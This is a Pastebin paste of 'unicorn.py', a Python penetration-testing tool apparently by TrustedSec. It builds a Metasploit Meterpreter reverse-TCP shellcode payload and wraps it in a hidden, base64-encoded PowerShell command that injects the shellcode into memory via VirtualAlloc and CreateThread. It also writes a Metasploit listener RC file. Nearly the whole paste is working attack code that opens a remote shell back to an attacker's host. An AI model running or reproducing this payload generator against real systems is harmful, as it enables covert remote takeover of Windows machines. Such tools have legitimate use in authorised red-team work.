API tools faq
paste
opexxx

unicorn.py

opexxx
Mar 7th, 2014
266
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.43 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # Magic Unicorn - PowerShell downgrade attack tool
  4. #
  5. # Written by: Dave Kennedy (@dave_rel1k)
  6. # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com
  7. #
  8. # Real quick down and dirty for native x86 powershell on any platform
  9. #
  10. # Usage: python unicorn.py payload reverse_ipaddr port
  11. # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
  12. #
  13. # Requirements: Need to have Metasploit installed.
  14. #
  15. # Special thanks to Matthew Graeber and Josh Kelley
  16. #
  17. import base64
  18. import re
  19. import subprocess
  20. import sys
  21.  
  22. # generate base shellcode
  23. def generate_shellcode(payload,ipaddr,port):
  24.     port = port.replace("LPORT=", "")
  25.     proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s c" % (payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
  26.     data = proc.communicate()[0]
  27.     # start to format this a bit to get it ready
  28.     repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : ''}
  29.     data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
  30.     return data
  31.  
  32. def format_payload(payload, ipaddr, port):
  33.     # generate our shellcode first
  34.     shellcode = generate_shellcode(payload, ipaddr, port).rstrip()
  35.     # sub in \x for 0x
  36.     shellcode = re.sub("\\\\x", "0x", shellcode)
  37.     # base counter
  38.     counter = 0
  39.     # count every four characters then trigger floater and write out data
  40.     floater = ""
  41.     # ultimate string
  42.     newdata = ""
  43.     for line in shellcode:
  44.         floater = floater + line
  45.         counter = counter + 1
  46.         if counter == 4:
  47.             newdata = newdata + floater + ","
  48.             floater = ""
  49.             counter = 0
  50.  
  51.     # heres our shellcode prepped and ready to go
  52.     shellcode = newdata[:-1]
  53.    
  54.     # one line shellcode injection with native x86 shellcode
  55.     powershell_code = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
  56.     full_attack = "powershell -nop -wind hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  
  57.  
  58.     # write out powershell attacks
  59.     filewrite = file("powershell_attack.txt", "w")
  60.     filewrite.write(full_attack)
  61.     filewrite.close()
  62.  
  63.     # write out rc file
  64.     filewrite = file("unicorn.rc", "w")
  65.     filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n" % (payload,ipaddr,port))
  66.     filewrite.close()
  67.  
  68.     print "[*] Exported powershell output code to powershell_attack.txt."
  69.     print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
  70.  
  71. # pull the variables needed for usage
  72. try:
  73.  
  74.     payload = sys.argv[1]
  75.     ipaddr = sys.argv[2]
  76.     port = sys.argv[3]
  77.     format_payload(payload,ipaddr,port)
  78.  
  79. # except out of index error
  80. except IndexError:
  81.  
  82.     print r"""
  83.                                                         ,/
  84.                                                        //
  85.                                                      ,//
  86.                                          ___   /|   |//
  87.                                      `__/\_ --(/|___/-/
  88.                                   \|\_-\___ __-_`- /-/ \.
  89.                                  |\_-___,-\_____--/_)' ) \
  90.                                   \ -_ /     __ \( `( __`\|
  91.                                   `\__|      |\)\ ) /(/|
  92.           ,._____.,            ',--//-|      \ |  '   /
  93.          /     __. \,          / /,---|       \      /
  94.         / /    _. \ \       `/`_/ _,'        |     |
  95.        |  | ( (  \  |      ,/\'__/'/          |     |
  96.        |  \ \`--, `_/_------______/           \(   )/
  97.        | | \ \_. \,                            \___/\
  98.        | |  \_   \ \                                \
  99.        \ \   \_ \  \  /                             \
  100.         \ \ \._  \__ \_|       |                       \
  101.          \ \___  \     \      |                        \
  102.           \__ \__ \ \_ |       \                        |
  103.           |  \_____ \ ____      |                        |
  104.           | \ \__ ---' .__\    |        |               |
  105.           \ \__ ---   /   )     |        \             /
  106.            \  \____/ / ()(      \         `---_       /|
  107.             \__________/(,--__    \_________.    |    ./ |
  108.               |     \ \ `---_\--,           \  \_,./   |
  109.               |      \ \_ ` \   /`---_______-\  \\    /
  110.                \     \.___,`|   /              \  \\   \
  111.                 \    |  \_ \|   \             (   |:    |
  112.                  \   \     \   |             /  / |    ;
  113.                   \   \     \   \         ( `_'   \ |
  114.                    \.   \     \.   \         `__/   |  |
  115.                      \  \      \.  \               |  |
  116.                       \  \       \ \              (  )
  117.                        \  |        \ |              |  |
  118.                         |  \        \ \             I  `
  119.                         ( __;        ( _;            ('-_';
  120.                         |___\       \___:            \___:
  121. """
  122.     print "Real quick down and dirty for native x86 powershell on any platform"
  123.     print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com"
  124.     print "Happy Magic Unicorns."
  125.     print "\n"
  126.     print "Usage: python unicorn.py payload reverse_ipaddr port"
  127.     print "Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!